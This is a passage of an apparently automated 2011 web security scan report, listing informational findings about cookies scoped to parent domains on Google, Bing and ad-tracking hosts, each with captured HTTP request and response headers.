The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=89236cb0868dd564:TM=1296661357:LM=1296661357:S=WZ2Y1_aytn1alowA; expires=Fri, 01-Feb-2013 15:42:37 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videosearch HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
Location: http://video.google.com/
Set-Cookie: PREF=ID=89236cb0868dd564:TM=1296661357:LM=1296661357:S=WZ2Y1_aytn1alowA; expires=Fri, 01-Feb-2013 15:42:37 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Wed, 02 Feb 2011 15:42:37 GMT
Server: VSFE_1.0
Content-Length: 221
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://video.google.com/">here</
...[SNIP]...

11.272. http://vs.dmtracker.com/tags/vs.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vs.dmtracker.com
Path:	/tags/vs.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=180511B6F2B95AA0; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.dmtracker.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tags/vs.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: vs.dmtracker.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: application/x-javascript
Last-Modified: Tue, 07 Apr 2009 23:53:28 GMT
Accept-Ranges: bytes
ETag: "08c12cdcb7c91:3d2"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP LAW PSA ADM DEV TAI IVA HIS OUR IND"
Set-Cookie: v1st=180511B6F2B95AA0; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.dmtracker.com
Date: Wed, 02 Feb 2011 15:12:54 GMT
Content-Length: 5209

//Version: JT02
//V1 of Instrumentation Toolkit Addition
//Staging version with staging sensors

var _JT=new Object();
_JT.protocol=location.protocol;//override "https:"
_JT.v="JT01.02";
_JT.ns
...[SNIP]...

11.273. http://w.ic.tynt.com/b/o previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://w.ic.tynt.com
Path:	/b/o

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=CgUVaU1JdE1Lz3TsB8qEAg==; expires=Thu, 02-Feb-12 15:12:13 GMT; domain=tynt.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/o?id=bpZvKQBBer360wadbi-bnq&i=http%3A%2F%2Fwww.ehow.com%2Faccount%2Fsimple_login.aspx&ts=1296659582198 HTTP/1.1
Host: w.ic.tynt.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 02 Feb 2011 15:12:13 GMT
Content-Type: image/gif
Content-Length: 35
Last-Modified: Mon, 22 Nov 2010 21:57:50 GMT
Connection: keep-alive
Cache-Control: "no-store, no-cache, must-revalidate, post-check=0, pre-check=0, false"
Expires: "Sat, 26 Jul 1997 05:00:00 GMT"
Set-Cookie: uid=CgUVaU1JdE1Lz3TsB8qEAg==; expires=Thu, 02-Feb-12 15:12:13 GMT; domain=tynt.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Accept-Ranges: bytes

GIF89a.............,...........D..;

11.274. http://www.bing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=0BC2ADE229F04634896564740A5A01D2; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:38:40 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cb5a6f99140c64e31bba9881e28dc2c32; expires=Thu, 31-Jan-2013 15:38:40 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1623818&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:38:40 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 28806
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Tue, 01 Feb 2011 15:38:40 GMT
Connection: close
Set-Cookie: _SS=SID=0BC2ADE229F04634896564740A5A01D2; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:38:40 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cb5a6f99140c64e31bba9881e28dc2c32; expires=Thu, 31-Jan-2013 15:38:40 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1623818&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:38:40 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...

11.275. http://www.bing.com/images/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/images/results.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

IMGSCHUSR=scratchpad=0&details=1&BE=1; expires=Thu, 31-Jan-2013 15:38:46 GMT; domain=.bing.com; path=/images
_SS=SID=EBE2AE360AFC4607A69EB91C0D4E6925; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:38:46 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c555a02fcae8c47d28a52d3ae0b9f2d11; expires=Thu, 31-Jan-2013 15:38:46 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1623818&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:38:46 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62642
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Tue, 01 Feb 2011 15:38:46 GMT
Connection: close
Set-Cookie: IMGSCHUSR=scratchpad=0&details=1&BE=1; expires=Thu, 31-Jan-2013 15:38:46 GMT; domain=.bing.com; path=/images
Set-Cookie: _SS=SID=EBE2AE360AFC4607A69EB91C0D4E6925; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:38:46 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c555a02fcae8c47d28a52d3ae0b9f2d11; expires=Thu, 31-Jan-2013 15:38:46 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1623818&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:38:46 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...

11.276. http://www.bing.com/local/ypdefault.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/local/ypdefault.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=988929FDD64C4D1397AB89DFC50C244C; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:00 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /local/ypdefault.aspx?cobrand=1 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:00 GMT
Connection: close
Set-Cookie: _SS=SID=988929FDD64C4D1397AB89DFC50C244C; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:00 GMT; domain=.bing.com; path=/

Ref A: 3BE2DD7ECE484DF5AF0C6F505B92734D Ref B: 216A95033A714694522EA5D13DA59023 Ref C: Wed Feb 02 07:44:00 2011
PST

11.277. http://www.bing.com/maps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/maps/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=C9D81CD615004306ABB664AF6EC8D896; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:39:27 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ccc3a00db11484f72972e3284910409fd; expires=Thu, 31-Jan-2013 15:39:27 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1623819&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:27 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 74334d7ead674cb794a2e61d6a848fc7
X-Ve-Server: BL2-01212-20110113.409-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001212
Date: Tue, 01 Feb 2011 15:39:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=C9D81CD615004306ABB664AF6EC8D896; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:39:27 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ccc3a00db11484f72972e3284910409fd; expires=Thu, 31-Jan-2013 15:39:27 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1623819&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:27 GMT; domain=.bing.com; path=/
Content-Length: 117365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...

11.278. http://www.bing.com/maps/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/maps/default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=65ECC52F9EF34CB981F99D7417322554; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:39:30 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c291799e91ad34543bf870f70a691a409; expires=Thu, 31-Jan-2013 15:39:30 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1623819&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:30 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/default.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 15878
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Tue, 01 Feb 2011 15:39:30 GMT
Connection: close
Set-Cookie: _SS=SID=65ECC52F9EF34CB981F99D7417322554; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:39:30 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c291799e91ad34543bf870f70a691a409; expires=Thu, 31-Jan-2013 15:39:30 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1623819&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:30 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

11.279. http://www.bing.com/maps/explore/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/maps/explore/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=8DADF1D644F34854A1E8CA7C9D9B5D46; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:36 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7082098a8b034a49aac0ad240992ac06; expires=Fri, 01-Feb-2013 15:43:36 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:37 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/explore/?org=aj&FORM=Z9LH9 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

11.280. http://www.bing.com/news/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/news/results.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_HOP=I=1&TS=1296574756; domain=.bing.com; path=/
_SS=SID=763DB5F1CCD148E2BB4E8A278E312C2C; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1623819&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:16 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: /news
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 01 Feb 2011 15:39:16 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296574756; domain=.bing.com; path=/
Set-Cookie: _SS=SID=763DB5F1CCD148E2BB4E8A278E312C2C; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1623819&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:16 GMT; domain=.bing.com; path=/

11.281. http://www.bing.com/news/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/news/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_HOP=I=1&TS=1296574758; domain=.bing.com; path=/
_SS=SID=359930AE5B034C0B815E7BBE1E780610; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1623819&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:18 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: /news
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 01 Feb 2011 15:39:18 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296574758; domain=.bing.com; path=/
Set-Cookie: _SS=SID=359930AE5B034C0B815E7BBE1E780610; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1623819&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:18 GMT; domain=.bing.com; path=/

11.282. http://www.bing.com/news/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/news/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=5764619496BA40119E677689023EF3BF; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:30 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cd72edb54d9204953b984e3b08f2bfcd9; expires=Fri, 01-Feb-2013 15:43:30 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:30 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/search?q=small+plane+makes+emergency+landing+on+nj+highway&form=msnhpm HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

11.283. http://www.bing.com/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/results.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_HOP=I=1&TS=1296574725; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/search
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 01 Feb 2011 15:38:46 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296574725; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/

11.284. http://www.bing.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_FS=mkt=en-US; domain=.bing.com; path=/
_SS=SID=2E1A7F5BA7644A2BAA06833125336168; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:02 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?q=February+1&mkt=en-us&FORM=MSNHPT HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
